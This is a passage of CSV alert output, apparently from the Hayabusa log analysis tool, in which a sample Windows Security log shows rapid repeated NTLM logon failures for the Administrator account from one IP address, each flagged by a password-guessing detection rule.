AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQ8Zu7ByLWddD4Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: paQzUptV8scmJvsG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQLsoIX9LPvbockz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRYbdVMbUlqFK8oM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
